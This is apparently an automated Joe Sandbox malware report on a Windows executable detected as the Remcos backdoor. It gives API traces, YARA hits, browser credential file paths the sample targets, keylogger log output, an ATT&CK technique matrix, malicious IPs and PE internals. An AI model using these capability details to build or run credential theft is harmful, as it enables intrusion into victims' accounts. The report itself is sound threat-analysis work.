                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeAPI call chain: ExitProcess graph end nodegraph_0-48226
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00443355 mov eax, dword ptr fs:[00000030h]0_2_00443355
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_004120B2 GetProcessHeap,HeapFree,0_2_004120B2
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043503C
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB71
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00434BD8 SetUnhandledExceptionFilter,0_2_00434BD8
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00412132
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00419662 mouse_event,0_2_00419662
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager169:80
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerO
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerK
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager2
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager}
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager<
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerY
                        Source: FPPhfkcDCh.exe, 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, logs.dat.0.drBinary or memory string: [Program Manager]
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00434CB6 cpuid 0_2_00434CB6
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: GetLocaleInfoA,0_2_0040F90C
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: EnumSystemLocalesW,0_2_0045201B
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: EnumSystemLocalesW,0_2_004520B6
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00452143
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: GetLocaleInfoW,0_2_00452393
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: EnumSystemLocalesW,0_2_00448484
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004524BC
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: GetLocaleInfoW,0_2_004525C3
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452690
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: GetLocaleInfoW,0_2_0044896D
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451D58
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: EnumSystemLocalesW,0_2_00451FD0
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_00404F51 GetLocalTime,CreateEventA,CreateThread,0_2_00404F51
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0041B69E GetComputerNameExW,GetUserNameW,0_2_0041B69E
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: 0_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0044942D
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: FPPhfkcDCh.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: FPPhfkcDCh.exe PID: 7560, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040BA4D
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040BB6B
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: \key3.db0_2_0040BB6B

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: FPPhfkcDCh.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.FPPhfkcDCh.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1670297660.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4124407338.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: FPPhfkcDCh.exe PID: 7560, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\FPPhfkcDCh.exeCode function: cmd.exe0_2_0040569A
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        11
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts12
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Bypass User Account Control
                        2
                        Obfuscated Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol211
                        Input Capture
                        2
                        Encrypted Channel
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts2
                        Service Execution
                        Logon Script (Windows)1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials In Files
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares3
                        Clipboard Data
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        NTDS2
                        File and Directory Discovery
                        Distributed Component Object ModelInput Capture1
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                        Process Injection
                        1
                        Virtualization/Sandbox Evasion
                        LSA Secrets23
                        System Information Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Access Token Manipulation
                        Cached Domain Credentials21
                        Security Software Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Process Injection
                        DCSync1
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        FPPhfkcDCh.exe84%ReversingLabsWin32.Backdoor.Remcos
                        FPPhfkcDCh.exe100%AviraBDS/Backdoor.Gen
                        FPPhfkcDCh.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://geoplugin.net/json.gp0%URL Reputationsafe
                        http://geoplugin.net/json.gp/C0%URL Reputationsafe
                        No contacted domains info
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpFPPhfkcDCh.exefalse
                        • URL Reputation: safe
                        unknown
                        http://geoplugin.net/json.gp/CFPPhfkcDCh.exefalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        101.99.93.169
                        unknownMalaysia
                        45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue
                        65.21.245.7
                        unknownUnited States
                        199592CP-ASDEtrue
                        103.144.139.157
                        unknownunknown
                        55720GIGABIT-MYGigabitHostingSdnBhdMYtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1544723
                        Start date and time:2024-10-29 16:48:18 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 24s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:FPPhfkcDCh.exe
                        renamed because original name is a hash value
                        Original Sample Name:e375d127ede7c4f45893d14e94e334672688b4861a5e2dfe54deda05a67b6727.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.expl.evad.winEXE@1/1@0/3
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 39
                        • Number of non-executed functions: 221
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240s for sample files taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: FPPhfkcDCh.exe
                        TimeTypeDescription
                        11:49:40API Interceptor5905337x Sleep call for process: FPPhfkcDCh.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        65.21.245.7gBYz86HSwI.msiGet hashmaliciousUnknownBrowse
                          0438.pdf.exeGet hashmaliciousUnknownBrowse
                            0438.pdf.exeGet hashmaliciousUnknownBrowse
                              0438.pdf.exeGet hashmaliciousUnknownBrowse
                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                  044f.pdf.scrGet hashmaliciousRMSRemoteAdminBrowse
                                    3e#U043c.scrGet hashmaliciousRMSRemoteAdminBrowse
                                      3e#U043c.scrGet hashmaliciousRMSRemoteAdminBrowse
                                        103.144.139.1573e#U043c.scrGet hashmaliciousRMSRemoteAdminBrowse
                                          3e#U043c.scrGet hashmaliciousRMSRemoteAdminBrowse
                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                GIGABIT-MYGigabitHostingSdnBhdMYbotnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 103.229.240.20
                                                SecuriteInfo.com.Win32.MalwareX-gen.23947.21328.exeGet hashmaliciousBlackMoonBrowse
                                                • 45.124.79.198
                                                SecuriteInfo.com.Win32.MalwareX-gen.23947.21328.exeGet hashmaliciousBlackMoonBrowse
                                                • 45.124.79.216
                                                Audio-0.45secs(Ar)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 185.93.164.24
                                                RemittanceDetails(Rjackson)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 185.93.164.24
                                                http://www.allencai.net/Get hashmaliciousUnknownBrowse
                                                • 103.198.200.7
                                                https://1vip365666.com:8989/Get hashmaliciousUnknownBrowse
                                                • 103.198.200.7
                                                https://ldubsinvesting.com/a/g/bqcfb/bwviud/YW1hbmRhLnlhcEBleGlzLXRlY2guY29tGet hashmaliciousHTMLPhisherBrowse
                                                • 220.158.200.176
                                                http://tiktokin-wholesale.com/Get hashmaliciousUnknownBrowse
                                                • 45.204.20.69
                                                http://tiktokit-wholesale.com/Get hashmaliciousUnknownBrowse
                                                • 45.204.20.69
                                                CP-ASDEgBYz86HSwI.msiGet hashmaliciousUnknownBrowse
                                                • 65.21.245.7
                                                SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                • 65.21.196.90
                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 65.21.245.7
                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 65.21.245.7
                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 65.21.245.7
                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 65.21.245.7
                                                iQPxJrxxaj.exeGet hashmaliciousPikaBotBrowse
                                                • 65.20.66.218
                                                iQPxJrxxaj.exeGet hashmaliciousPikaBotBrowse
                                                • 65.20.66.218
                                                http://www.thegioimoicau.com/Get hashmaliciousUnknownBrowse
                                                • 65.21.45.74
                                                Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                • 65.21.196.90
                                                SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYgBYz86HSwI.msiGet hashmaliciousUnknownBrowse
                                                • 111.90.140.76
                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 111.90.140.76
                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 111.90.140.76
                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 111.90.140.76
                                                0438.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 111.90.140.76
                                                b.cmdGet hashmaliciousUnknownBrowse
                                                • 101.99.92.203
                                                rrwzOU7A9F.exeGet hashmaliciousXWormBrowse
                                                • 101.99.92.203
                                                3xlcP3DFLm.exeGet hashmaliciousXWormBrowse
                                                • 101.99.92.203
                                                JruZmEO5Dm.exeGet hashmaliciousXWormBrowse
                                                • 101.99.92.203
                                                zVlbADkNqu.exeGet hashmaliciousXWormBrowse
                                                • 101.99.92.203
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\FPPhfkcDCh.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):144
                                                Entropy (8bit):3.369034834541982
                                                Encrypted:false
                                                SSDEEP:3:rhlKlM+XlcOl84/fU5JWRal2Jl+7R0DAlBG45klovDl6v:6ljNxk5YcIeeDAlOWAv
                                                MD5:D5BDD505EDF11EEE1FF1689113896A9C
                                                SHA1:F0C92E0757E5C9D92A8808E7C601DFC8549F916D
                                                SHA-256:2B7C0B507E842A7215ABE652CAF81C578ECB4E6536CE03941D1F732CAD608F27
                                                SHA-512:DEC30CC4E81B9480BABA35881A9E4B099C46DF16BFB3961815F9ACA083FAAABFA857D34BAF2E1A55C57C395AB67DF98070FE5A4E9761EB18D33B9F9D2F9C8B61
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\rmc\logs.dat, Author: Joe Security
                                                Reputation:low
                                                Preview:....[.2.0.2.4./.1.0./.2.9. .1.1.:.4.9.:.0.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.6034964741543964
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:FPPhfkcDCh.exe
                                                File size:495'104 bytes
                                                MD5:c9312aa42f69cc66491124567e969f24
                                                SHA1:f99cbdf260491fc99a0b4a1e40053056ab6b68f7
                                                SHA256:e375d127ede7c4f45893d14e94e334672688b4861a5e2dfe54deda05a67b6727
                                                SHA512:7301dc80d5582b8807afe25c07db2d7cde81b27396012ae5f304bc98bb772f6d5bf99a07070bdbab14355ded8cf2bad69ebd80669a61ad832ae6e876528f7a37
                                                SSDEEP:6144:/Tz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZmAX4cr4T4:/TlrYw1RUh3NFn+N5WfIQIjbs/ZmXT4
                                                TLSH:28B49E01BAD2C072D97514300D3AF776EAB8BD201835497B73E61D5BFE31190A72AAB7
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~...~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..
                                                Icon Hash:95694d05214c1b33
                                                Entrypoint:0x434a80
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x66D71DE3 [Tue Sep 3 14:32:03 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:1389569a3a39186f3eb453b501cfe688
                                                Instruction
                                                call 00007F9B814F076Bh
                                                jmp 00007F9B814F01B3h
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000324h
                                                push ebx
                                                push esi
                                                push 00000017h
                                                call 00007F9B81512A03h
                                                test eax, eax
                                                je 00007F9B814F0327h
                                                mov ecx, dword ptr [ebp+08h]
                                                int 29h
                                                xor esi, esi
                                                lea eax, dword ptr [ebp-00000324h]
                                                push 000002CCh
                                                push esi
                                                push eax
                                                mov dword ptr [00471D14h], esi
                                                call 00007F9B814F2776h
                                                add esp, 0Ch
                                                mov dword ptr [ebp-00000274h], eax
                                                mov dword ptr [ebp-00000278h], ecx
                                                mov dword ptr [ebp-0000027Ch], edx
                                                mov dword ptr [ebp-00000280h], ebx
                                                mov dword ptr [ebp-00000284h], esi
                                                mov dword ptr [ebp-00000288h], edi
                                                mov word ptr [ebp-0000025Ch], ss
                                                mov word ptr [ebp-00000268h], cs
                                                mov word ptr [ebp-0000028Ch], ds
                                                mov word ptr [ebp-00000290h], es
                                                mov word ptr [ebp-00000294h], fs
                                                mov word ptr [ebp-00000298h], gs
                                                pushfd
                                                pop dword ptr [ebp-00000264h]
                                                mov eax, dword ptr [ebp+04h]
                                                mov dword ptr [ebp-0000026Ch], eax
                                                lea eax, dword ptr [ebp+04h]
                                                mov dword ptr [ebp-00000260h], eax
                                                mov dword ptr [ebp-00000324h], 00010001h
                                                mov eax, dword ptr [eax-04h]
                                                push 00000050h
                                                mov dword ptr [ebp-00000270h], eax
                                                lea eax, dword ptr [ebp-58h]
                                                push esi
                                                push eax
                                                call 00007F9B814F26EDh
                                                Programming Language:
                                                • [C++] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6eeb80x104.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x790000x4c08.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x3bc8.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x6d3500x38.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x6d3e40x18.rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6d3880x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x590000x500.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x571f50x57200e504ab64b98631753dc227346d757c52False0.5716379348995696data6.6273936921798455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x590000x179dc0x17a002a24a2cbf738bf5f992a0162fad3d464False0.5008577215608465data5.862074061245876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x710000x5d440xe000eaccffe1cb836994ce5d3ccfb22d4f9False0.22126116071428573data3.0035180736120775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .tls0x770000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .gfids0x780000x2300x4009ca325bce9f8c0342c0381814603584aFalse0.330078125data2.3999762503719224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x790000x4c080x4e00b12250f3038e6e06062f6e30956dab2dFalse0.28660857371794873data4.116094294569894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x7e0000x3bc80x3c00047d13d1dd0f82094cdf10f08253441eFalse0.7640625data6.723768218094163IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x7918c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                                RT_ICON0x795f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                                RT_ICON0x79f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                                RT_ICON0x7b0240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                                RT_RCDATA0x7d5cc0x5fbdata1.007184846505552
